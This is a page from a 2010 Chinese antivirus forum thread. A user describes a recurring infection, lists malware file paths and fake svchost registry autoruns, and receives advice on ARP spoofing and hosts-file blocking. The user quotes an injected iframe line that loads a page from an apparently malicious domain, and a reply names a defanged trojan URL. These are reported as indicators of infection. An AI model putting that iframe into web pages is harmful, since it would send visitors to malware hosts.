瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 又有新情况了!情况相当危及,所有杀软件都用上了,系统也装了,都无用呀

12   2  /  2  页   跳转

[已解决] 又有新情况了!情况相当危及,所有杀软件都用上了,系统也装了,都无用呀

回复:情况相当危及,所有杀软件都用上了,系统也装了,都无用呀

这两个都没了?刚才那个用哪个软件删除?那些文件删除不了呀???
gototop
 

回复 11F 振德电子 的帖子

gototop
 

回复:情况相当危及,所有杀软件都用上了,系统也装了,都无用呀

好的,先试试,谢谢,电脑太慢了
gototop
 

回复: 情况相当危及,所有杀软件都用上了,系统也装了,都无用呀

我把下面的文件删除了,然后重装系统不会了,但是过一段时间又复发了。好像是专业针对IE6浏览器的,现在安装了火弧又好点了,还望大虾相助一下,QQ:747740728 (远程帮助我一下,谢谢) c:\windows\system32\murnnqhnyg\smss.exe
c:\windows\systemdebug.exe
c:\program files\common files\system\kb340748.cnt
c:\program files\common files\system\kb521832.nls
c:\program files\common files\system\kb601109.tmt
c:\program files\svchost.exe
c:\windows\system32\svch0sft.exe
c:\windows\system32\drivers\svchost.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\TEMP\~NSU.TMP\AU_.EXE

删除重启后使用SREng修复下面各项:

    启动项目 -- 注册表之如下项删除:
[360safeman]    <C:\Program Files\svchost.exe>
[SVCH0SFT]    <C:\WINDOWS\system32\SVCH0SFT.EXE>
[KVP]    <C:\WINDOWS\system32\drivers\svchost.exe>
另发几个不处理的文件(小点的)打包上来。
此病毒还有特别之处,打开优酷或KU6,然后查看这些网站的源代码时都添加了,这个代码
<iframe src='http://www.dyoej.com


/361.html' width=100 height=0></iframe> 打开这些网页所以很不正常,都变形了
最后编辑振德电子 最后编辑于 2010-12-11 01:05:49
gototop
 

回复: 又有新情况了!情况相当危及,所有杀软件都用上了,系统也装了,都无用呀

基本上看你的说明可以确定是ARP病毒,你可以从多方面防护。
1、装ARP防火墙
2、从你给的网址分析木马地址是hxxp://www.gnqdi.com/360.css
可以将以下内容加入hosts
127.1 www.dyoej.com
127.1 www.gnqdi.com
3、也可以把360.css文件加入软件安全策略中的哈希策略中
最后编辑湖心小筑 最后编辑于 2010-12-11 19:59:52
gototop
 

回复:又有新情况了!情况相当危及,所有杀软件都用上了,系统也装了,都无用呀

确实是ARP攻击,用金山ARP解决了。
gototop
 
12   2  /  2  页   跳转
页面顶部
Powered by Discuz!NT